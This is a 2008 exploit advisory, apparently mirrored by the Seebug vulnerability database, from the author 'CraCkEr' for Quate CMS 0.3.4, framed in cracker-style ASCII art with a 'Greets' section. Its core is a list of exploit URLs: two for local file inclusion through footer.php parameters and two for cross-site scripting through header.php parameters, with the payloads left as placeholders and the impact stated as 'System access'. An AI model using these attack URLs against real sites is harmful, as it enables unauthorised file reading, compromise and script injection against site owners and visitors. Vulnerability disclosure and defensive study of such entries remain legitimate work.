Quate CMS 0.3.4 footer.php/header.php(LFI/XSS) Multiple Remote Vulnerabilities

2008-08-07T00:00:00
ID SSV:9255
Type seebug
Reporter Root
Modified 2008-08-07T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ┌┌───────────────────────────────────────────────────────────────────────────┐
││                             C r a C k E r                                ┌┘
┌┘          T H E   C R A C K   O F   E T E R N A L   M I G H T             ││
└───────────────────────────────────────────────────────────────────────────┘┘

 ┌────      From The Ashes and Dust Rises An Unimaginable crack....      ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘               [ Local File Include ] [ XSS ]                             ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:   Author   : CraCkEr                : :                                    :
│   Group    : N/A                    │ │                                    │
│   Script   : Quate CMS 0.3.4        │ │         Register Globals :         │
│   Download : quate.net              │ │                                    │
│   Method   : GET                    │ │          [█] ON   [ ] OFF          │
│   Critical : High [░░▒▒▓▓██]        │ │                                    │
│   Impact   : System access          │ │                                    │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│                              DALnet #crackers                             ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:                                                                            :
│  Release Notes:                                                            │
│  ═════════════                                                             │
│  Typically used for remotely exploitable vulnerabilities that can lead to  │
│  system compromise.                                                        │
│                                                                            │

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                             Exploit URL's                                ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘

[LFI]
  
http://localhost/path/admin/includes/footer.php?row_secure[account_theme]=[LFI]
http://localhost/path/admin/includes/footer.php?admin_template_default=[LFI]

[XSS]

http://localhost/path/admin/includes/themes/default/header.php?page_area=[XSS]
http://localhost/path/admin/includes/themes/default/header.php?page_header=[XSS]

   
└────────────────────────────────────────────────────────────────────────────┘
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                              © CraCkEr 2008                              ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘